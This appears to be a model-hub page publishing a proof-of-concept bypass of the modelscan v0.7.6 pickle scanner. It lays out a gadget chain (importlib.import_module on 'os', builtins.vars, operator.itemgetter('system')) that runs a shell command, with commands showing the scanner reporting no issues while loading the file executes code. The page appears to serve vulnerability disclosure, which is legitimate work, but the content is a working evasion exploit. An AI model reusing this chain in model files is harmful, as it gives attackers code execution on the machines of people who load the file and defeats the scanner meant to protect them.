modelscan Bypass PoC: builtins.vars + operator.itemgetter
Vulnerability
Demonstrates a bypass of ProtectAI's modelscan v0.7.6 using:
importlib.import_moduleโ imports arbitrary modules (not blocked)builtins.varsโ extracts module dict (passes substring filter)operator.itemgetterโ extracts named items from dicts (not blocked; onlyattrgetteris blocked)
Impact
Full command execution while modelscan reports zero issues.
Chain
operator.itemgetter("system")(
builtins.vars(
importlib.import_module("os")
)
)("echo pwned")
Reproduce
modelscan scan -p pytorch_model.bin # โ No issues found
python3 -c "import pickle; pickle.loads(open('pytorch_model.bin','rb').read())" # โ RCE
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support